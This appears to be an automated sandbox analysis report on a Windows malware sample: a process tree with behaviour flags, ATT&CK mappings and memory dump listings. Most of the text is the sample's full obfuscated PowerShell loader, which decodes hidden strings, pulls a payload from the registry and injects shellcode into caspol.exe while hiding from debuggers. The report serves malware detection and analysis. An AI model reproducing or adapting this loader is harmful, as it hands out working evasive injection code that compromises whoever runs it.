Pr'ScASe1ArDCh7KlEVa4BaEMo8aiEAr9TeENe0SaERe1UmEFo0SeAAfBPlCRd1DoEIs0AuEHj3MaEFaCDeEfoBAmEch0KoCVi8MoEre0NoFUt1SoEReDJaEAfAAmEKo1FaABeDtoALi1UmCBe7OvEOu4AbEFlELaETh9StFPaCFiFSp6DdEPr0DaETuBKaEHe0VrFBi6UrBUn7HeABr9MuAVa5ArAAr1ReCFo7SuEFo4PrEPeEbrERa9VeFHyCMlFEj6ReESt0ErEfoBBaEKl0DaFBu6AbBFo6FaAVa9ChAMi5foASp1CiCMe8AsEGa4SoFDi7PiEPr2FoESc4GuFSc7SeEHe0PrFGl1loEEfDJuESe4GoFDe6AmASo9IsAHi5StAMy1ReDGu6ArFHuCFdEUd2SeESp0StAThCReASqBHoDFi6TeESu0EnFaf1MiCKeCBrETe8foFRa5BaEIm9MuETe0TyEHe8NaETr0IgEexBtrFKr1DrEHu4teFSw1FiEHoCOvEVeAGaEMiBSaCOb3GiEFo9CoELe4FaEUn2AgFBr6UnAPeDAnASk1UbCSyDPrEKe0RoFAl7DkEskADiESuCkoFFr6PrEAnEReECh0ScFSi6CrBEx2LyAInCAn'kr;Sp&pl(Ca`$MiBDoaTrkColBoyCosFoelintveCosTe7Dr)Kn Di`$DvBSpiGeoRupQuyFrrUniUnbEdoDelNoeMa4Ti;Te`$TyBPoiSmoTapCoyGnrPiiHabMooUdlEkeBa5Sp An=Do DeHLiTTrBDu Ka'BdFSg7KyESp0VeFBu1BrFPo0CaFCa7PaEElBcoASk5GeAUn1FoDNe7MaEGo4ReEFr8LiECe9NoEte0QuECa1NiEid0AnAPiBBuCRi6OcFan7SaEBi0EkEVe4BiFUn1ReECo0DeDHu1PrFdoCTrFSt5MeEMe0caARuDHeAPoCBu'Us;Re&Fe(Fe`$HrBAcajukUnlMiyBasDeeStnSkeTosBr7De)Ar Fi`$SoBJaiFeostpReyStrSkiBrbCooPalUaeUl5Gi No St Au;au}Su`$haAUntRerUdoFolUkaSpcsetKaiFlcOm Mo=Ov SbHDeTBrBAr Su'FoEBrEReEMa0HuFEl7UnEHoBJaEKv0KnEMi9ExBBa6BeBDa7Ak'Go;Un`$StBUniHooUnpReyOrrSeithbLuothlCheAp6So Ba=Ga ErHAmTUnBGa Di'AfAAl1LiFCl1ReEFr0PoEinELeEfoEEuEScBFoEAn0ObFSt1NoFSt6DaANe5MaBHe8NoAPh5AsDUnEVeDGl6MeFHiCLuFFo6KlFOl1FoEBu0NaEfi8KnASeBBeDUn7KuFAu0DyELaBVrFBj1piEAmCWiESl8SrEMu0StASmBbeCLoCMaEPrBMaFBu1BeETr0InFIn7KrEAnAAnFIs5LaDUn6flENe0OkFzi7DkFSe3EnEPoCPsESu6ReEJe0SpFPe6TrAOmBDiCFr8ElEBl4ArFAl7FuFCa6ErENoDAlEMo4PeECh9EdDOr8TuBRaFAvBPaFloCRo2AmEAd0PaFKn1scCMo1SyEBe0HoEIn9StECo0BlEUd2tnEOv4StFSe1OvESa0BrCSa3RaEInABaFEx7ReCvg3KrFLa0FaEstBNoEDi6JoFIn1BuEHeCCrEBiAAnEOeBKaDSp5BdEWaASkECoCDiETiBPrFfo1FrEHj0RoFFr7BoAFeDKoAdiDRaEGl3SkEHeEHeFLn5VeADe5HeAAm1StCSi4ZoFMe1KrFRo7ShETvABsEUd9FrEBi4TyESa6MiFsk1PhEFiCUnEdr6FoAva5PrAGa1FiCBr7LfEKa4UnEskEOpEAf9MuFSpCArFNa6AkEVi0frEZaBMuESa0LsFCe6BaBMa1FuAEdCTaAWo9UnACo5RaASeDDoCUn2HeCKa1IcDHo1SaASo5OpCDo5PeADeDHaDStEInCDeCAmEHeBPrFNo1RoDNo5MeFPo1DiFTr7SiDEd8prANo9AkASt5SiDUtEHnDMu0ChCFlCLeEemBLoFUr1LeBBi6AtBFe7UrDse8NiAHe9GeAcr5LaDbeEIlDSp0OxCMeCHeEStBGnFDr1PrBAn6KvBSt7YaDGu8JuACa9ReApo5DaDNeEMaDIn0CoCScCSmENoBGrFga1InBDe6OvBco7HaDse8KeAPaCAnAse5SoAUnDStDQuEInCSwCKoEFdBSlFRi1CaDCa5UdFSt1SoFFa7ScDSt8ByAMaCLaAKiCtrAsaCFo'Ca;Mo&Mo(Na`$UrBNaakokFrlPayTasSyeSenPseRisSc7Ot)Ka St`$AiBGriKioLupDuyArrCoiWhbNooInlineKe6Sh;Sa`$NocshoSasPrsShebutTsidinArgAa Ph=Fo refPlkempSo Co`$AnBfraPokFllbryHosCoeDonkveDmsDi5Ti Gl`$daBDiaskkTtlSlyLasTheOpnMeeGrsPr6Sl;Ji`$edBPaiSaoDepSiymarSeiMobUnoTulCheSk7Er Ba=Ri ViHpiTHoBSu Pr'ToAOp1LaFel0koEUdBjaFRe7ErEGlCTyFDi6MuEUl0PaECoBFeBOv6GlAca5kaBWh8TeAAe5SiADy1ErFFu1InEPr0GaESaEViEbiEOpEfoBEmEOp0DiFSe1AbFOn6feAElBDmCAaCNgESeBViFLa3TrEFoAStEPaECoETi0AlAsuDToDBiEGeCAcCSkEBeBVeFMa1BeDch5SkFEk1MeFHj7BeDTh8SpBleFtiBVeFUnDPrFAlEUd0ThFCi7BeEMeAFoAPl9SnAXe5HeBTe3AnBOv0BlBAs4AsABr9MeAEs5HjBTi5CoFOuDWrBNo6ElBCi5ErBPa5SqBTa5VaANu9OpAGe5HyBBl5RvFInDKuBUn1BeBBe5MiAPlCFo'Sa;Fi&Ti(St`$NoBSkaRekTrlPayptsXeeNinPreIlsCh7Sp)Ko Gr`$CyBPeiMeoBrpAnySlrNoiLybCroBalGaeCy7Un;Ul`$PhBUniDeoPhpReyFlrIniSnbLnoMilJgeVi8Su Ue=De EcHumTsvBBs be'diALs1EkCTr9HoEHeAstEIn2JuEHaCAnFfl6RnFMo1UhEKaCJoERiEApELrEPoEHe0GeFSl7GrEHyBSuEde0AdFKi6ElAKo5FrBOv8YoApa5IdASm1SuFTr1OpEFl0AsEGeEHyECrEJuEOvBBoERa0eiFSu1AmFMi6CoAbeBEiCNeCHjEEpBbyFWi3LiEAnAAnERoEpaEUd0trATiDSeDRiEFoCArCUnERiBAtFUn1HyDfr5KuFBy1AtFMa7TaDPr8PrBFoFInBliFReDRiFBlEDa0UnFDi7CeEIdAFiACo9PiADy5HaBVi7ImBwh6BuBHa4SpBPi0cyBFa1AcBGe3EnBOaDSuBMaDSlAHj9DoABu5FoBEl5CuFboDFiBCu6MaBch5SmBDi5AlBGa5noAAr9ObASt5AuBUn5unFDaDNeBBe1TaAGnCSl'op;Ar&Ov(Si`$ChBAnaGrkHolEcyOpsmleVinpsesosTo7De)st ud`$beBEniCioHepOvySurPliUnbSkoBelAleBl8Ak;Na`$AnMGreSadFliUntUnegeramrHiaVenUn1At3Sk5aa=Fa(SaGFoeAftCo-DrIUntVeeFdmAbPParTaoFipDieTarTitMiyUn Kr-OuPOraMatsehOr Ph'StHQuKBoCBeUDu:Tr\PaDNyeNelHaeMdtNaiTomVaeHyrKr4Do2Re\TaULonNorTaeNosDieUdnPatFifDeuSplFolImyDi'Re)Lu.UdPSuaUdsJasLoaBlnBrtFeeCarDesRe;Vi`$StBAiiGaoNopCoyAfrCliSmbBeostlQueGa9Ti Bi=Po MaHDgTSpBDe Im'afAHa1NiCun7GoEPrCDoEspASpFPa5JaFPrCHaFFe7PaESeCInERe7RiEGeAAnETi9FeELu0FjADa5GeBCh8PsASt5NeDKaESiDMe6SpFThCRuFHo6slFSh1GaEHe0ChEEv8OvARaBCaCWa6PaEGaADaEEpBDeFCr3UtEDy0EnFva7SoFSo1LaDEl8FoBStFThBRiFGoCKr3saFTu7coEPeARoENo8DiCRo7BaETr4SkFEl6MaESl0FlBme3trBSy1weDHa6ChFNo1SqFse7ThEEuCFoEReBSoEbi2OvANoDGrAOr1HvCHi8SeEWe0ViEMo1GoEKaCSkFPo1SaEFe0SmFDi7UnFTr7RuEOm4StEKnBatBUn4NeBfl6PoBSe0ClAZoCDi'Kn;Kr&Bo(Li`$KeBDyaKrkSolDeyRisLeeConIneResSt7di)Pi Li`$WrBSkiTroSlpTryBerGriGybOvoSkldreKo9Dn;Ar`$UdMDyeSkdSuiSytHyeNorAsrGgaBrnIn1Cr3Me5Re0Lo Ro=Ve taHKoTGeBSt Be'grDluELaDFa6ElFSoCHoFFo6FoFSo1KaESu0AnENa8MiAEnBFoDYt7BeFSm0StEpaBoxFVe1GdEFaCSjEPa8SkEFo0OuASpBAlCThCSeEElBReFPr1UdEGo0ScFUr7FoESlAmiFUn5MoDUn6BeEFj0CaFSv7AnFTe3UsERiCInEga6SiESt0KaFHa6FrAMiBBlCKi8GlECo4SuFTr7EfFSy6ReEDeDpeEGr4BeEre9IsDTa8RoBThFCaBEsFDiCEx6PhEIdATiFBr5beFFoCChANeDbuATj1noCPu7DaEBiCHuEpsAAnFVa5SkFFeCPaFMa7NuELiCShEVs7VaESkAAfEId9PoEdu0siASt9BaAAv5stBBr5SiAEp9VeAId5IsAAr5ShAco1StFOp0DrEAfBOvFLi7InEboCFrFPj6SkEPr0NaENaBWeBSe6GeADe9RiAHa5VeBUn3GeBRe0MeBDe4KaAJeCDe'Co;Di&Pa(du`$VoBteaArkKalApyInsCoeRenKaeHasCe7Fo)Pa Im`$VoMReeThdSoiKotDreBrrDorMaaUnnKm1Gi3St5Le0Pr;Fl`$KlSHyuAnnStlMaacrmCepAl=Ec`$TaBHjiNgoRepNayUlrPeiSebStoHolTueMe.cocNeoVeuFonOutTy-Sp6be5Ce1Ya;Ve`$FrMSaelidBiiAltReePerParBaaRenHy1Om3Su5Wr1un Om=Nu miHDeTGaBos Ac'SiDPrEOhDUn6StFUnCAdFSn6VeFFa1SuEba0TjESu8LoAImBLiDGu7PsFki0BrEBiBSyFvi1VeEMeCCeEAt8BiEPr0TeAEvBUnCpeCVeEfoBFrFUn1DaEFr0ReFCo7MeEAmARaFRe5BrDTy6RaEUn0AlFCu7TiFRe3DiEAlCPsEEl6UmESu0AtFpa6UdAVaBAfCSu8suEDe4CiFMi7UlFGy6TrEAnDFoEpe4HaEBl9SpDPe8BaBGrFScBAuFreCSn6TaEKvAmaFSk5KoFAaCMiAmeDtoAPr1CoCZo7FoEMoCSaEChAMaFRe5FoFInCBaFLl7TaEChCfaECo7PsEreAKeESy9veEGr0NoASp9JdATe5StBEv3SeBdh0SoBGa4LeAbr9DaAVa5DeACa1MaCMe9AtETnAStESl2cyEMaCSiFTe6PrFNa1TeETaCKaEFoESvEKnENeESu0SeFLu7TeEUnBBeEpa0PoFTo6kaATi9TiACa5UnAGr1SeDUt6ArFMa0BaEPrBBaESe9SlEJo4PrEOr8DiFUn5BoATiCUd'Un;Ch&Me(Ha`$FoBGuarukAalBiyOnsAfetinOueOpsSt7ko)Br Ca`$MaMPrePadUdiKrtCeeVarMirSwaTanBe1Fa3Vi5Fo1Br;Li`$DaMeceSidDeiRhtHyeTrrCorEraEnnIm1Le3Re5Ef2Je Va=No PhHEnTSeBSl Nu'DrAPo1OpCUvETaEVe9GaETaAenFBu3ReEBa0GaEFrBLiAUn5DaBBi8DaAal5NrDafETrDEv6spFSkCCiFGe6SuFKi1HeEHe0DeEUn8TuAAnBhjDDe7hiFCh0coEhaBHaFSt1AlEBeCCoESu8GrEBa0FlAPsBSaCObCAtEEnBPaFUl1UnEHj0SuFIn7CyERoAGeFPr5TeDLy6BlEPo0AcFPr7FoFTi3DeEHjCdoETh6SvELa0faFek6CaASaBExCQu8soEAa4OgFBu7SiFSt6prEInDPrEUn4WiESi9AlDMi8GuBVeFUdBBaFReCEn2TrEUd0GrFEu1GiCIn1PaEAf0KoESt9DiEVa0FaEIn2YaEDo4flFBu1ReEan0UgCKi3seEDiAtaFNo7TrCCo3ThFPr0ReEreBOsEMi6SlFCo1TiESlCTrEFaAStESpBWhDAn5ClETrAInESeCSuETiBCuFHe1MeEKo0ChFQu7MaApiDUnAstDUrETr3ViEFrEEnFCo5ToAHo5AlABe1KoCHa4SaFGe7MiECh6DeEDeDFoEop1UdENe0BoEDe4HoESk6ElEMiAChEReBUnFme6BrESeDKrEFoCToFGo5OuABa5LoAEx1myCBe4drEFi8LeFKn1CaFPu7HiEUr4RaEVaESyATuCDeALe9BeATv5GuAWhDWiCan2adCEx1AnDPo1BrACh5VaCem5KaAceDStDStEOpCUrCRiERuBTeFFo1ArDsu5PrFMi1ugFHu7UdDDe8FrASl9ArAHn5TeDReEAlCStCsiEbeBUnFUn1FeDKo5FeFPr1RiFDe7IlDun8ExAHe9SoAFl5BaDArEClCDiCPrEFoBPoFEn1UnDHe5StFNe1SuFSe7SeDSk8LgACo9SnAEu5vaDLoENoCViCEkESjBIdFRa1FoDLa5skFSt1skFgr7TiDTe8LiAGl9AbAUs5FiDTrEYoCdsCLiEOvBtoFBe1PhDPu5AnFRe1PoFMi7BaDDo8FaAdiCStADe5InACoDTuDeuElaCPaCgeEFoBKoFPo1ReDVe5UfFCl1BlFTe7StDAn8HyAStCdeAStCWrAEmCUn'Bo;Re&Sy(Du`$elBNaaSukOplLgyeasRoePynDjeSpsMi7Te)Si Kv`$OmMRaeHudroiRetseeFrrAarPraconUn1Ch3Pi5By2Di;Re`$AfMFreEtdHjiCatAleSerMerCoaionAn1Ci3Mu5Sk3Co St=Ma StHHeTReBDi Ko'BrARu1LiCBiESyEIn9TrEOmAGaFLa3StEst0PrEReBCrAInBWaCLuCTeETrBDeFTo3PaERiADeEQuEBrEDe0FoAOmDGrAGi1FaFHu0OcEAtBAmFSt7SeEVoCSkFTo6DyEMo0UrEViBHeBOd6SyARe9InAma1BrCSl9LoEDiAsuEFa2ElEinCBrFFo6liFCh1ElEJoCVaEMoENaEKrETiENa0FoFhe7VeEBrBFuEor0UnFUn6FoAAb9GaATe1ReEAk6ToEReACoFMu6AaFRe6AtEBa0OmFIn1beEGaCPoEchBFiEDa2enALn9JeBOm5CaABa9MaBBe5OpAKoCFo'Su;ki&Ok(Su`$AdBCraAtkKolBayAasEteFunBaeDaspr7Sk)Mr Me`$auMMgePadOmiThtJueSarNerInaLynFi1Da3Te5He3Fl#Ba;""";;Function Mediterran1359 { param([String]$Rhizomata); $Sabbitha = $Rhizomata.toCharArray(); For($filosoffen=2; $filosoffen -lt $Sabbitha.count-1; $filosoffen+=(2+1)){ $Genkalder = $Genkalder + $Sabbitha[$filosoffen]; } $Genkalder;}$Lakkers0 = Mediterran1359 'UnIMenFovPooIokBeeud-SeEBixskpRarMaeunsAssDsiJuoUdnGa ';$Lakkers2 = Mediterran1359 'TrsVitQuaCorLutCh-SnjunoSobAl ';$Lakkers1= Mediterran1359 $Varsomste;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Lakkers1 ;}else{&$Lakkers0 $Lakkers1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Fortovsretterne23100 {param([String]$Rhizomata);For($filosoffen=2; $filosoffen -lt $Rhizomata.Length-1; $filosoffen+=(2+1)){$Genkalder = $Genkalder + $Rhizomata.Substring($filosoffen, 1);}$Genkalder;}$Fortovsretterne23102 = Fortovsretterne23100 'ReISunUdvDuoDrkdoeTe-UdESuxDipFargaeInsYusBriUroTenBy ';$Fortovsretterne23101 = Fortovsretterne23100 'Ad$PuFRhjSeeRdnEmdAasSlkPsaKebSleBerDonOpeMesTo[pu$MufBiithlProSksBloApfOnfMieVanDy/Sc2La]De Ra=He in[RecUmoOrnMivBleDirGjtAu]Ho:In:OvTProTyBDiyKotOreAm(fu$OpRNehOviovzDioSomreaHetOpaan.niSuduNybCysentAnrGriFenSagSk(Tu$VefCoiInlUdoPosAloCofHafAfeNanBo,Ph Ha2Un)Wi,Gr Ko1Ba6Ld)St ';Function HTB {param([String]$Rhizomata);$Fjendskabernes = New-Object byte[] ($Rhizomata.Length / 2);For($filosoffen=0; $filosoffen -lt $Rhizomata.Length; $filosoffen+=2){.($Fortovsretterne23102) $Fortovsretterne23101;$Fjendskabernes[$filosoffen/2] = ($Fjendskabernes[$filosoffen/2] -bxor 133);}[String][System.Text.Encoding]::ASCII.GetString($Fjendskabernes);}$Heroiskes0=HTB 'D6FCF6F1E0E8ABE1E9E9';$Heroiskes1=HTB 'C8ECE6F7EAF6EAE3F1ABD2ECEBB6B7ABD0EBF6E4E3E0CBE4F1ECF3E0C8E0F1EDEAE1F6';$Heroiskes2=HTB 'C2E0F1D5F7EAE6C4E1E1F7E0F6F6';$Heroiskes3=HTB 'D6FCF6F1E0E8ABD7F0EBF1ECE8E0ABCCEBF1E0F7EAF5D6E0F7F3ECE6E0F6ABCDE4EBE1E9E0D7E0E3';$Heroiskes4=HTB 'F6F1F7ECEBE2';$Heroiskes5=HTB 'C2E0F1C8EAE1F0E9E0CDE4EBE1E9E0';$Heroiskes6=HTB 'D7D1D6F5E0E6ECE4E9CBE4E8E0A9A5CDECE1E0C7FCD6ECE2A9A5D5F0E7E9ECE6';$Heroiskes7=HTB 'D7F0EBF1ECE8E0A9A5C8E4EBE4E2E0E1';$Heroiskes8=HTB 'D7E0E3E9E0E6F1E0E1C1E0E9E0E2E4F1E0';$Heroiskes9=HTB 'CCEBC8E0E8EAF7FCC8EAE1F0E9E0';$Baklysenes0=HTB 'C8FCC1E0E9E0E2E4F1E0D1FCF5E0';$Baklysenes1=HTB 'C6E9E4F6F6A9A5D5F0E7E9ECE6A9A5D6E0E4E9E0E1A9A5C4EBF6ECC6E9E4F6F6A9A5C4F0F1EAC6E9E4F6F6';$Baklysenes2=HTB 'CCEBF3EAEEE0';$Baklysenes3=HTB 'D5F0E7E9ECE6A9A5CDECE1E0C7FCD6ECE2A9A5CBE0F2D6E9EAF1A9A5D3ECF7F1F0E4E9';$Baklysenes4=HTB 'D3ECF7F1F0E4E9C4E9E9EAE6';$Baklysenes5=HTB 'EBF1E1E9E9';$Baklysenes6=HTB 'CBF1D5F7EAF1E0E6F1D3ECF7F1F0E4E9C8E0E8EAF7FC';$Baklysenes7=HTB 'CCC0DD';$Baklysenes8=HTB 'D9';$Archdeaconship=HTB 'D0D6C0D7B6B7';$Amtrak=HTB 'C6E4E9E9D2ECEBE1EAF2D5F7EAE6C4';function fkp {Param ($ruthlessly, $Sydvestre) ;$Biopyribole0 =HTB 'A1CCE1EAE9E4F1F7ECF6ECEBE2A5B8A5ADDEC4F5F5C1EAE8E4ECEBD8BFBFC6F0F7F7E0EBF1C1EAE8E4ECEBABC2E0F1C4F6F6E0E8E7E9ECE0F6ADACA5F9A5D2EDE0F7E0A8CAE7EFE0E6F1A5FEA5A1DAABC2E9EAE7E4E9C4F6F6E0E8E7E9FCC6E4E6EDE0A5A8C4EBE1A5A1DAABC9EAE6E4F1ECEAEBABD6F5E9ECF1ADA1C7E4EEE9FCF6E0EBE0F6BDACDEA8B4D8ABC0F4F0E4E9F6ADA1CDE0F7EAECF6EEE0F6B5ACA5F8ACABC2E0F1D1FCF5E0ADA1CDE0F7EAECF6EEE0F6B4AC';&($Baklysenes7) $Biopyribole0;$Biopyribole5 = HTB 'A1C8F0F6EEF7E4F1A5B8A5A1CCE1EAE9E4F1F7ECF6ECEBE2ABC2E0F1C8E0F1EDEAE1ADA1CDE0F7EAECF6EEE0F6B7A9A5DED1FCF5E0DED8D8A5C5ADA1CDE0F7EAECF6EEE0F6B6A9A5A1CDE0F7EAECF6EEE0F6B1ACAC';&($Baklysenes7) $Biopyribole5;$Biopyribole1 = HTB 'F7E0F1F0F7EBA5A1C8F0F6EEF7E4F1ABCCEBF3EAEEE0ADA1EBF0E9E9A9A5C5ADDED6FCF6F1E0E8ABD7F0EBF1ECE8E0ABCCEBF1E0F7EAF5D6E0F7F3ECE6E0F6ABCDE4EBE1E9E0D7E0E3D8ADCBE0F2A8CAE7EFE0E6F1A5D6FCF6F1E0E8ABD7F0EBF1ECE8E0ABCCEBF1E0F7EAF5D6E0F7F3ECE6E0F6ABCDE4EBE1E9E0D7E0E3ADADCBE0F2A8CAE7EFE0E6F1A5CCEBF1D5F1F7ACA9A5ADA1CCE1EAE9E4F1F7ECF6ECEBE2ABC2E0F1C8E0F1EDEAE1ADA1CDE0F7EAECF6EEE0F6B0ACACABCCEBF3EAEEE0ADA1EBF0E9E9A9A5C5ADA1F7F0F1EDE9E0F6F6E9FCACACACACA9A5A1D6FCE1F3E0F6F1F7E0ACAC';&($Baklysenes7) $Biopyribole1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Syge,[Parameter(Position = 1)] [Type] $Margarethas = [Void]);$Biopyribole2 = HTB 'A1D7E4E8E9E0E1E0A5B8A5DEC4F5F5C1EAE8E4ECEBD8BFBFC6F0F7F7E0EBF1C1EAE8E4ECEBABC1E0E3ECEBE0C1FCEBE4E8ECE6C4F6F6E0E8E7E9FCADADCBE0F2A8CAE7EFE0E6F1A5D6FCF6F1E0E8ABD7E0E3E9E0E6F1ECEAEBABC4F6F6E0E8E7E9FCCBE4E8E0ADA1CDE0F7EAECF6EEE0F6BDACACA9A5DED6FCF6F1E0E8ABD7E0E3E9E0E6F1ECEAEBABC0E8ECF1ABC4F6F6E0E8E7E9FCC7F0ECE9E1E0F7C4E6E6E0F6F6D8BFBFD7F0EBACABC1E0E3ECEBE0C1FCEBE4E8ECE6C8EAE1F0E9E0ADA1CDE0F7EAECF6EEE0F6BCA9A5A1E3E4E9F6E0ACABC1E0E3ECEBE0D1FCF5E0ADA1C7E4EEE9FCF6E0EBE0F6B5A9A5A1C7E4EEE9FCF6E0EBE0F6B4A9A5DED6FCF6F1E0E8ABC8F0E9F1ECE6E4F6F1C1E0E9E0E2E4F1E0D8AC';&($Baklysenes7) $Biopyribole2;$Biopyribole3 = HTB 'A1D7E4E8E9E0E1E0ABC1E0E3ECEBE0C6EAEBF6F1F7F0E6F1EAF7ADA1CDE0F7EAECF6EEE0F6B3A9A5DED6FCF6F1E0E8ABD7E0E3E9E0E6F1ECEAEBABC6E4E9E9ECEBE2C6EAEBF3E0EBF1ECEAEBF6D8BFBFD6F1E4EBE1E4F7E1A9A5A1D6FCE2E0ACABD6E0F1CCE8F5E9E0E8E0EBF1E4F1ECEAEBC3E9E4E2F6ADA1CDE0F7EAECF6EEE0F6B2AC';&($Baklysenes7) $Biopyribole3;$Biopyribole4 = HTB 'A1D7E4E8E9E0E1E0ABC1E0E3ECEBE0C8E0F1EDEAE1ADA1C7E4EEE9FCF6E0EBE0F6B7A9A5A1C7E4EEE9FCF6E0EBE0F6B6A9A5A1C8E4F7E2E4F7E0F1EDE4F6A9A5A1D6FCE2E0ACABD6E0F1CCE8F5E9E0E8E0EBF1E4F1ECEAEBC3E9E4E2F6ADA1CDE0F7EAECF6EEE0F6B2AC';&($Baklysenes7) $Biopyribole4;$Biopyribole5 = HTB 'F7E0F1F0F7EBA5A1D7E4E8E9E0E1E0ABC6F7E0E4F1E0D1FCF5E0ADAC';&($Baklysenes7) $Biopyribole5 ;}$Atrolactic = HTB 'EEE0F7EBE0E9B6B7';$Biopyribole6 = HTB 'A1F1E0EEEEEBE0F1F6A5B8A5DED6FCF6F1E0E8ABD7F0EBF1ECE8E0ABCCEBF1E0F7EAF5D6E0F7F3ECE6E0F6ABC8E4F7F6EDE4E9D8BFBFC2E0F1C1E0E9E0E2E4F1E0C3EAF7C3F0EBE6F1ECEAEBD5EAECEBF1E0F7ADADE3EEF5A5A1C4F1F7EAE9E4E6F1ECE6A5A1C7E4EEE9FCF6E0EBE0F6B1ACA9A5ADC2C1D1A5C5ADDECCEBF1D5F1F7D8A9A5DED0CCEBF1B6B7D8A9A5DED0CCEBF1B6B7D8A9A5DED0CCEBF1B6B7D8ACA5ADDECCEBF1D5F1F7D8ACACAC';&($Baklysenes7) $Biopyribole6;$cosseting = fkp $Baklysenes5 $Baklysenes6;$Biopyribole7 = HTB 'A1F0EBF7ECF6E0EBB6A5B8A5A1F1E0EEEEEBE0F1F6ABCCEBF3EAEEE0ADDECCEBF1D5F1F7D8BFBFDFE0F7EAA9A5B3B0B4A9A5B5FDB6B5B5B5A9A5B5FDB1B5AC';&($Baklysenes7) $Biopyribole7;$Biopyribole8 = HTB 'A1C9EAE2ECF6F1ECEEEEE0F7EBE0F6A5B8A5A1F1E0EEEEEBE0F1F6ABCCEBF3EAEEE0ADDECCEBF1D5F1F7D8BFBFDFE0F7EAA9A5B7B6B4B0B1B3BDBDA9A5B5FDB6B5B5B5A9A5B5FDB1AC';&($Baklysenes7) $Biopyribole8;$Mediterran135=(Get-ItemProperty -Path 'HKCU:\Deletimer42\Unresentfully').Passanters;$Biopyribole9 = HTB 'A1C7ECEAF5FCF7ECE7EAE9E0A5B8A5DED6FCF6F1E0E8ABC6EAEBF3E0F7F1D8BFBFC3F7EAE8C7E4F6E0B3B1D6F1F7ECEBE2ADA1C8E0E1ECF1E0F7F7E4EBB4B6B0AC';&($Baklysenes7) $Biopyribole9;$Mediterran1350 = HTB 'DED6FCF6F1E0E8ABD7F0EBF1ECE8E0ABCCEBF1E0F7EAF5D6E0F7F3ECE6E0F6ABC8E4F7F6EDE4E9D8BFBFC6EAF5FCADA1C7ECEAF5FCF7ECE7EAE9E0A9A5B5A9A5A5A1F0EBF7ECF6E0EBB6A9A5B3B0B4AC';&($Baklysenes7) $Mediterran1350;$Sunlamp=$Biopyribole.count-651;$Mediterran1351 = HTB 'DED6FCF6F1E0E8ABD7F0EBF1ECE8E0ABCCEBF1E0F7EAF5D6E0F7F3ECE6E0F6ABC8E4F7F6EDE4E9D8BFBFC6EAF5FCADA1C7ECEAF5FCF7ECE7EAE9E0A9A5B3B0B4A9A5A1C9EAE2ECF6F1ECEEEEE0F7EBE0F6A9A5A1D6F0EBE9E4E8F5AC';&($Baklysenes7) $Mediterran1351;$Mediterran1352 = HTB 'A1CEE9EAF3E0EBA5B8A5DED6FCF6F1E0E8ABD7F0EBF1ECE8E0ABCCEBF1E0F7EAF5D6E0F7F3ECE6E0F6ABC8E4F7F6EDE4E9D8BFBFC2E0F1C1E0E9E0E2E4F1E0C3EAF7C3F0EBE6F1ECEAEBD5EAECEBF1E0F7ADADE3EEF5A5A1C4F7E6EDE1E0E4E6EAEBF6EDECF5A5A1C4E8F1F7E4EEACA9A5ADC2C1D1A5C5ADDECCEBF1D5F1F7D8A9A5DECCEBF1D5F1F7D8A9A5DECCEBF1D5F1F7D8A9A5DECCEBF1D5F1F7D8A9A5DECCEBF1D5F1F7D8ACA5ADDECCEBF1D5F1F7D8ACACAC';&($Baklysenes7) $Mediterran1352;$Mediterran1353 = HTB 'A1CEE9EAF3E0EBABCCEBF3EAEEE0ADA1F0EBF7ECF6E0EBB6A9A1C9EAE2ECF6F1ECEEEEE0F7EBE0F6A9A1E6EAF6F6E0F1ECEBE2A9B5A9B5AC';&($Baklysenes7) $Mediterran1353#"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 2232
5⤵
- Program crash
PID:1956

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 2768 -ip 2768
1⤵
PID:332

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2768 -s 836
1⤵
- Program crash
PID:2232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5032 -ip 5032
1⤵
PID:2472

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2388-150-0x00007FF8350F0000-0x00007FF8352E5000-memory.dmp

Filesize
2.0MB

Download
memory/2388-135-0x0000000000000000-mapping.dmp

Download
memory/2388-148-0x0000000007BB0000-0x00000000091C5000-memory.dmp

Filesize
22.1MB

Download
memory/2388-149-0x0000000007BB0000-0x00000000091C5000-memory.dmp

Filesize
22.1MB

Download
memory/2388-136-0x00000000023A0000-0x00000000023D6000-memory.dmp

Filesize
216KB

Download
memory/2388-137-0x0000000004EC0000-0x00000000054E8000-memory.dmp

Filesize
6.2MB

Download
memory/2388-138-0x0000000004E00000-0x0000000004E22000-memory.dmp

Filesize
136KB

Download
memory/2388-139-0x00000000054F0000-0x0000000005556000-memory.dmp

Filesize
408KB

Download
memory/2388-140-0x00000000055D0000-0x0000000005636000-memory.dmp

Filesize
408KB

Download
memory/2388-141-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

Filesize
120KB

Download
memory/2388-162-0x0000000007BB0000-0x00000000091C5000-memory.dmp

Filesize
22.1MB

Download
memory/2388-143-0x0000000007530000-0x0000000007BAA000-memory.dmp

Filesize
6.5MB

Download
memory/2388-144-0x0000000006250000-0x000000000626A000-memory.dmp

Filesize
104KB

Download
